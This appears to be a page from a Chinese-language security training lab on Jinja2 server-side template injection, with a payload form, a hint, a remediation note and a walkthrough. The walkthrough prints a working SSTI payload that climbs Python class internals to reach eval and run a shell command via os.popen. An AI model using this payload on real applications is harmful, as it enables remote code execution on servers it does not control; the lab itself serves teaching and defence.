<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>SSTI模板注入-JINJA2模板注入</title>
  <link rel="stylesheet" href="../../plugins/googleapis/fonts.css">
  <link rel="stylesheet" href="../../plugins/fontawesome-free/css/all.min.css">
  <link rel="stylesheet" href="../../plugins/overlayScrollbars/css/OverlayScrollbars.min.css">
  <link rel="stylesheet" href="../../dist/css/adminlte.min.css">
</head>
<body class="hold-transition light-mode sidebar-mini layout-fixed layout-navbar-fixed layout-footer-fixed">
<div class="wrapper">
  <nav id="Navbar" class="main-header navbar navbar-expand navbar-light"></nav>
  <aside id="Container" class="main-sidebar sidebar-light-primary elevation-4"></aside>
  <div class="content-wrapper" id="Wrapper">
    <section class="content-header" id="WrapperHeader"></section>
    <section class="content">
      <div class="container-fluid">
        <div id="notice"></div>
        <div class="card card-primary card-outline">
          <div class="card-header">
            <h3 class="card-title"><strong>JINJA2模板注入</strong></h3>
          </div>
          <div class="card-body">
            <div class="card card-primary">
              <div class="card-header">
                <h3 class="card-title">输入你的payload</h3>
              </div>
              <form action="" onsubmit="return false">
                <div class="card-body">
                  <div class="form-group">
                    <input type="text" class="form-control" name="spelText" id="payload" placeholder="Enter spelText">
                  </div>
                  <button type="submit" class="btn btn-primary" onclick="ToSSTI()">执行语句</button>
                </div>
              </form>
            </div>
          </div>
        </div>
        <div class="card card-warning card-outline" id="hint">
            <div class="card-header">
                <h3 class="card-title"><strong>思路提示</strong></h3>
            </div>
            <div class="card-body">
                <div>
                  <ul><li>你知道吗，Jinja2模板注入的思想精髓，在于python代码逃逸！！</li></ul>
                </div>
            </div>
        </div>
        <div class="card card-success card-outline" id="writeUp">
            <div class="card-header">
                <h3 class="card-title"><strong>正确实现</strong></h3>
            </div>
            <div class="card-body">
              <ol start=""><li><p><span>在漏洞页面直接输入Payload即可，尝试表达式</span><code>{{7*7}}</code><span>进行运算：</span></p><p><div class="card col-lg-11 col-xl-11"><img src="assist/l1-1.png" referrerpolicy="no-referrer" alt="l1-1"></div></p></li><li><p><span>尝试执行命令，打印字符（payload有多种，这里随便测试一种）：</span></p><ul><li><p><code>{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.__globals__.values() %}{% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval']('__import__("os").popen("echo fanqie").read()') }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}</code></p></li></ul><p><div class="card col-lg-11 col-xl-11"><img src="assist/l1-2.png" referrerpolicy="no-referrer" alt="l1-2"></div></p></li></ol>
            </div>
        </div>
        <div class="card card-info card-outline" id="showSource">
            <div class="card-header">
                <h3 class="card-title"><strong>源码解析</strong></h3>
            </div>
            <div class="card-body">
              <ul style="margin-bottom: 0;"><li>在后端接收前端传参用作模板生成时，应对其进行严格过滤，而不是直接渲染或拼接使用：</li></ul>
              <div class="card-body" style="padding-top: 0%; padding-bottom: 0%;"><object type="text/html" data="assist/sCode-1.html" width="100%" height="215px"></object></div>
          </div>
        </div>
        <div class="card card-orange card-outline" id="repository">
            <div class="card-header">
                <h3 class="card-title"><strong>知识梳理</strong></h3>
            </div>
            <div class="card-body">
              <div style="padding-top: 0%; padding-bottom: 0%;"><object type="text/html" data="assist/sum-1.html" width="100%" height="7120px"></object></div>
            </div>
        </div>
      </div>
    </section>
  </div>
</div>

  <aside class="control-sidebar control-sidebar-dark">
    <!-- Control sidebar content goes here -->
  </aside>
  <footer class="main-footer"></footer>
  <script src="../../dist/js/templateHandle.js"></script>
  <script>
    setWrapperHeader("SSTI模板注入", ["动态使用表达式"]);
  </script>
  <script src="../../plugins/jquery/jquery.min.js"></script>
  <script src="../../plugins/bootstrap/js/bootstrap.bundle.min.js"></script>
  <script src="../../plugins/overlayScrollbars/js/jquery.overlayScrollbars.min.js"></script>
  <script src="../../dist/js/adminlte.js"></script>
  <script>
    function ToSSTI() {
      var payload = document.getElementById('payload').value;
      var url = 'http://{ENV:NET_IP}:{ENV:FLASK_PORT}/api/ssti/l1/jinja2?param=' + encodeURIComponent(payload);

      var xhr = new XMLHttpRequest();
      xhr.open("GET", url, true);
      xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
          $("#notice")[0].innerHTML = generateNote(xhr.responseText);
        } else if (xhr.readyState === 4 && xhr.status !== 200) {
          console.error('Error with the request: ' + xhr.status);
        }
      };
      xhr.send();
    }
  </script>
</body>
</html>
